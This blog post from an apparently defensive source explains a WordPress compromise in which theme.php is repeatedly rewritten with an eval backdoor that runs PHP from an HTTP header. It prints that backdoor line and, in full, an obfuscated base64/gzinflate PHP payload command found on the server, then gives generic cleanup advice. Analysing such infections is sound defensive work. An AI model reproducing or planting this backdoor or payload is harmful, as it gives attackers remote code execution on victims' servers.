wp-includes/theme.php file modified with @eval ($_SERVER[‘HTTP _7206F67’]) ; malware code

May 28, 2024
   

Case:

Clients wordpress site core files were being modified with @eval($_SERVER[‘HTTP_ 7206F67’]); code. After changing the file it reappear after a few second.

what does eval($_SERVER['HTTP_7206F67']); do

The snippet @eval($_SERVER[‘HTTP_7206F67’]); appears to be PHP code that is potentially malicious. Here’s a breakdown of its components and their implications:

  1. @eval: The eval function in PHP evaluates a string as PHP code. Using eval can be very dangerous because it executes arbitrary code, which could be a security risk if the input is not properly sanitized. The @ symbol is used to suppress any error messages that might be generated by the eval function.
  2. $_SERVER[‘HTTP_7206F67’]: This accesses a value from the $_SERVER superglobal array, specifically looking for a server variable named HTTP_7206F67. Server variables like this are typically set by the client (e.g., through HTTP headers).
The eval function can execute any PHP code. If an attacker can control the value of $_SERVER[‘HTTP_7206F67’], they can execute arbitrary code on the server, potentially leading to a full compromise of the server.
 
 Need to find where it can be.

Found the @eval code

				
					/usr/bin/php -r 'eval(gzinflate(base64_decode("jVJrb5swFP2eX8GkSCRKNUHSJEJTtbVZaUkaaEMLlGmKwDaNwRgKJilM/e8zefchbf6AbXzOufeeexvpIh0lNLA8gqHHUEt8vE8kg7LUCM+HoEokvUrwTc+qAFZ6sAeW0NEJoNOlZ6sMdglBcfrslkoPjOTUj/Uc2jMCSkXyrizmmv2Vd32OjW40mN6zygijUwOPO67jLnyVIWe0AD55KR0zBZP1fQYnZBU5Mru4sVKIKlex5T6wZenZUZnvkBV1RmOOYWAsr7DzsHiw1ItAr7SVHj12dXn73+JaqsxxL7DmTyzOHxHfCRmchKwDSm3o3Sel0ZsOppU20KILAmM1n4xmwYNkmVZkmXYJNUud3TkVKKc/3Ss9BNQxo6EW1t5MN96ECQ5IH4AyjaHdD+EVWfJ6qkkXEqgqFbwmuevoiWtbktOdpSC2OEYpkaXIICYd39SGwd3Zmdj+1ggKChhOqPC+I80cZW3hT6Mh8EVwzoRWMygIufXY4kRo5mXOUHxJl/wMEoj4lnqMoYy2hTOhoJyNuVSFWr6Xo8HpHKIatpHlcWvVZp4UGUAcH2CC5k+IzUFCGaIsP8TaYnEgtNIMPc1jj4FF6038jUy7zlbYrgyxIqMb6ute4MuxwjbdPZ8f1i8o/4fSJndMQZJlCLAZekIvvIacZfMMpcQDfJyRKHwVxKW33oh4Iog/vntZtr56pXhs4M4Milbmzo91njuxd6G4lngo+hPycSK7kn5Jv7eN4hncXt/OL40bfnr7vBfZqh4+H8w7tv9A+x/f6lbHDMe7tq/PR+0WOoIsbWgFJZhGH0ZhPSxp8dmwfFIES4o64SPEPipHvDb+Ag==")));'
				
			
  1. PHP CLI Command: /usr/bin/php -r

    • This runs a PHP script provided directly as a string, using the PHP command-line interface (CLI).
  2. Base64 Decode and Inflate:

    • The base64_decode function decodes the provided base64-encoded string.
    • The gzinflate function then decompresses the decoded string, which is likely compressed using the DEFLATE algorithm.
  3. Eval:

    • The eval function evaluates the resulting decompressed string as PHP code, effectively executing it.

Outcome

After decoding and decompressing, the output will reveal the actual PHP code intended to be executed. Given the common usage of such techniques, the payload is likely to be some form of malware, such as:

  • Web Shell: Providing attackers with a remote interface to execute commands.
  • Backdoor: Allowing unauthorized access or control over the server.
  • Data Exfiltration: Sending sensitive data to an external server.

Immediate Actions

  1. Remove the Malicious Code: Identify and remove any instances of the decoded script on your server.
  2. Check for Other Compromises: Look for other signs of infection or compromise on your server.
  3. Update and Patch: Ensure all software is up to date and patched against known vulnerabilities.
  4. Harden Security: Implement security best practices, such as using a web application firewall (WAF), regularly reviewing logs, and restricting unnecessary services.

By following these steps, you can mitigate the immediate threat and secure your server against future attacks.




    Leave a Comment